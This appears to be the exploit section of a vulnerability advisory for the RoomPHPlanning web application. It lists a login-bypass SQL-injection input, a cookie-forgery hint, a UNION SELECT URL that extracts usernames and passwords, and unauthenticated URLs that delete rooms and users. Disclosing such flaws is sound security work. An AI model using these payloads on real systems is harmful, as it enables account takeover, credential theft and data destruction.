• info
• discussion
• exploit
• solution
• references

RoomPHPlanning Multiple Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example input is available:
username:real_user' or '1=1
password:ThE g0bL!N

The following example code is available:
setcookie($cookie,$idus,time()+3600,"/");=> $cookiename=room_phplanning $idus= user_id

The following example URIs are available:

(to perform SQL-injection attacks)
http://www.example.com/admin/userform.php?id=-1+union+select+1,concat(LoginUs,0x3a,PwdUs),3+FROM+rp_user+where%20IdUs=1--

(to delete rooms and users)
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=$room id
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=1
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?user=user id